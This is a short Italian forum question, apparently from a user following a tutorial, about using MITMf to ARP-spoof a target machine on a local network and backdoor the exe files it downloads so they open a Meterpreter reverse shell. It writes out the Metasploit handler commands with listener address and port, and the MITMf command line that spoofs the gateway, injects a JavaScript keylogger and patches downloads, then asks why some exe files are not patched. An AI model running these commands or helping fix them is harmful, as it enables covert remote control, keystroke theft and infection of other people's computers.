Da questo tutorial ho scoperto che è possibile utilizzare strumento MITMf per il download di file "vittima" dei file exe per aprire una shell meterpreter. I comandi che sono stati utilizzati sono i seguenti:
use exploit/multi/handler
set payloads windows/metepreter/reverse_tcp
set lhost 192.168.1.4
set lport 4888
exploit
per aprire meterpreter e
mitmf -i eth0 --arp --spoof --gateway 192.168.1.1 --target 192.168.1.8 --jskeylogger --filepwn
Il problema è che non applica la patch a tutti i file exe come menzionato nel tutorial. Quindi la domanda è: quali file esegue la patch e quali no ??